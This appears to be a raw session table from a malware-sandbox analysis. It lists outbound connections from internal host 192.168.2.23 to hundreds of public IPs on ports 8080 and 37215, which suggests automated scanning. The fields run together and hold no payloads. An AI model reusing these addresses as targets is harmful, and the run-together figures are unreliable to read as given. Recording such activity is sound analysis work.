                                                        29167192.168.2.235324414.70.37.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29168192.168.2.2349474183.76.49.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29169192.168.2.233862253.27.132.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29170192.168.2.233921283.227.131.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29171192.168.2.233934677.201.217.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29172192.168.2.2355994142.220.22.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29173192.168.2.233819657.158.115.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29174192.168.2.2356956123.18.230.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29175192.168.2.2335546187.197.171.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29176192.168.2.2335512107.73.204.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29177192.168.2.2341858171.102.20.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29178192.168.2.2359924191.34.243.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29179192.168.2.2343600190.248.81.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29180192.168.2.234762240.139.63.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29181192.168.2.233528651.50.237.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29182192.168.2.234341097.93.157.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29183192.168.2.234521248.197.204.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29184192.168.2.235791268.135.116.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29185192.168.2.2335880132.190.186.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29186192.168.2.235130064.77.255.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29187192.168.2.236097246.30.91.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29188192.168.2.2336526125.49.75.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29189192.168.2.2350132219.79.81.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29190192.168.2.23607889.4.40.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29191192.168.2.235407668.88.120.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29192192.168.2.2346208182.201.107.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29193192.168.2.2333030128.207.142.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29194192.168.2.2340866129.175.97.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29195192.168.2.2352748141.48.215.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29196192.168.2.2352084146.64.60.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29197192.168.2.2347374177.135.20.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29198192.168.2.235860887.200.255.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29199192.168.2.233904424.183.199.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29200192.168.2.23431205.126.82.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29201192.168.2.2355420153.188.238.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29202192.168.2.235567266.222.189.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29203192.168.2.2346680140.42.47.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29204192.168.2.2345130135.54.104.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29205192.168.2.2353014166.169.118.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29206192.168.2.2340754182.160.213.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29207192.168.2.235448839.195.249.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29208192.168.2.236013289.121.42.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29209192.168.2.2336340140.63.107.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29210192.168.2.235340282.235.117.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29211192.168.2.2358346197.98.224.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29212192.168.2.234307841.255.105.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29213192.168.2.235878223.209.72.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29214192.168.2.2351786197.77.163.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29215192.168.2.2353894197.6.140.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29216192.168.2.2335770204.114.183.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29217192.168.2.234887441.33.20.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29218192.168.2.2360786197.84.193.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29219192.168.2.2341626157.17.28.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29220192.168.2.2346560197.75.6.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29221192.168.2.234582441.85.147.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29222192.168.2.2360654157.145.235.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29223192.168.2.2335114157.101.16.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29224192.168.2.235219641.127.194.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29225192.168.2.2342924157.35.226.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29226192.168.2.2333856151.167.225.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29227192.168.2.235237241.225.196.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29228192.168.2.2359278157.100.205.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29229192.168.2.2358068197.130.2.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29230192.168.2.2350712197.13.77.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29231192.168.2.234582241.172.85.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29232192.168.2.2350418197.128.173.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29233192.168.2.2345546197.170.91.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29234192.168.2.2339600197.1.199.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29235192.168.2.233349041.159.120.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29236192.168.2.234443254.220.9.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29237192.168.2.2342028157.70.220.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29238192.168.2.2350060172.180.14.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29239192.168.2.2340006197.172.159.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29240192.168.2.2356766157.201.126.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29241192.168.2.2335522136.194.93.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29242192.168.2.2344842197.48.115.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29243192.168.2.2360218157.172.68.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29244192.168.2.2348462157.142.189.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29245192.168.2.2340138157.245.11.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29246192.168.2.2333138157.38.10.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29247192.168.2.2357388197.100.45.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29248192.168.2.2336004197.177.134.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29249192.168.2.234330841.129.79.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29250192.168.2.2342666119.41.178.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29251192.168.2.234292814.158.52.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29252192.168.2.2348648197.18.116.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29253192.168.2.2354090197.57.236.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29254192.168.2.235117841.74.213.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29255192.168.2.233293641.117.100.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29256192.168.2.2332798197.165.11.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29257192.168.2.2346780197.136.63.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29258192.168.2.2345236197.18.145.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29259192.168.2.2347944186.170.190.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29260192.168.2.2347926157.231.243.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29261192.168.2.234875441.248.1.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29262192.168.2.2337386157.57.80.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29263192.168.2.2357930157.28.132.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29264192.168.2.234112641.159.100.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29265192.168.2.2353984142.102.173.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29266192.168.2.2353818197.98.191.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29267192.168.2.233983275.57.22.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29268192.168.2.234713677.177.250.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29269192.168.2.2350870197.105.51.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29270192.168.2.2345392197.249.223.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29271192.168.2.234479262.228.216.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29272192.168.2.236006684.19.42.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29273192.168.2.234225641.136.36.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29274192.168.2.235112041.24.244.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29275192.168.2.2348378197.189.139.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29276192.168.2.233285641.197.163.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29277192.168.2.235821041.201.12.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29278192.168.2.2359696197.179.230.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29279192.168.2.2335390157.121.231.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29280192.168.2.235512441.219.228.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29281192.168.2.2335374157.100.246.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29282192.168.2.2359120157.112.44.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29283192.168.2.2360972157.185.205.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29284192.168.2.2337868197.2.41.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29285192.168.2.2356952142.44.12.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29286192.168.2.235979041.53.12.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29287192.168.2.234468441.102.199.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29288192.168.2.234984460.129.165.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29289192.168.2.233906671.103.204.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29290192.168.2.2344504157.43.160.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29291192.168.2.2349772157.88.147.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29292192.168.2.235795246.133.108.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29293192.168.2.235997841.52.96.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29294192.168.2.234066241.251.112.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29295192.168.2.2357060197.187.49.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29296192.168.2.235394441.48.121.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29297192.168.2.2359072157.155.47.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29298192.168.2.235685241.160.189.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29299192.168.2.2359530197.207.15.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29300192.168.2.235506287.233.112.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29301192.168.2.233440241.50.94.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29302192.168.2.2360768157.76.48.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29303192.168.2.235001241.126.57.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29304192.168.2.2334592157.207.22.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29305192.168.2.2350792197.7.58.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29306192.168.2.2351750157.41.51.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29307192.168.2.235736241.245.151.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29308192.168.2.2334056157.92.209.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29309192.168.2.2340136197.241.211.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29310192.168.2.2334076197.189.90.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29311192.168.2.2350318157.93.91.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29312192.168.2.2337366145.182.233.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29313192.168.2.2340030205.248.147.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29314192.168.2.233959476.67.1.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29315192.168.2.2357208105.158.24.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29316192.168.2.2341960157.127.160.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29317192.168.2.2360486197.99.119.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29318192.168.2.235028041.113.142.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29319192.168.2.2355264157.250.69.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29320192.168.2.2353880157.192.112.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29321192.168.2.2349966157.30.63.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29322192.168.2.2356648197.169.61.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29323192.168.2.2339864157.90.92.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29324192.168.2.2332778197.161.156.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29325192.168.2.234713245.153.55.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29326192.168.2.235153241.186.87.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29327192.168.2.2341884197.51.61.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29328192.168.2.235864665.212.18.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29329192.168.2.236086241.199.145.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29330192.168.2.2358770204.229.211.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29331192.168.2.234368862.236.0.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29332192.168.2.233458036.163.240.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29333192.168.2.2350744197.75.1.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29334192.168.2.2359516197.48.204.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29335192.168.2.2357142221.149.30.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29336192.168.2.2340242157.224.207.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29337192.168.2.2357952157.204.106.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29338192.168.2.2352306157.210.170.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29339192.168.2.2358604187.88.229.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29340192.168.2.2359498197.243.10.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29341192.168.2.2342960157.18.239.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29342192.168.2.2359192197.165.48.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29343192.168.2.233350497.210.207.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29344192.168.2.2348914157.104.0.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29345192.168.2.2357046206.51.38.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29346192.168.2.2347496157.182.178.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29347192.168.2.233939241.223.50.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29348192.168.2.2358816188.217.187.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29349192.168.2.2338080197.86.27.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29350192.168.2.2356676157.6.253.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29351192.168.2.2338772157.247.14.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29352192.168.2.234329848.125.231.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29353192.168.2.2359902157.3.157.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29354192.168.2.2360606168.11.217.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29355192.168.2.2347174197.152.36.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29356192.168.2.2356438197.134.106.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29357192.168.2.233530241.150.214.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29358192.168.2.235636641.148.142.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29359192.168.2.2334010149.96.143.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29360192.168.2.2334996197.164.188.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29361192.168.2.2360084197.57.159.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29362192.168.2.234611844.89.79.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29363192.168.2.2356752157.253.129.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29364192.168.2.2350206198.140.137.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29365192.168.2.2336810197.132.159.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29366192.168.2.2344632168.141.199.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29367192.168.2.2356666197.158.101.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29368192.168.2.234593441.230.40.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29369192.168.2.233300441.164.173.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29370192.168.2.2352282197.60.95.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29371192.168.2.2346986157.128.241.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29372192.168.2.235873868.194.55.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29373192.168.2.233433841.155.61.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29374192.168.2.234416041.1.80.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29375192.168.2.235364490.235.23.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29376192.168.2.2337078157.60.219.13737215
                                                        TimestampBytes transferredDirectionData


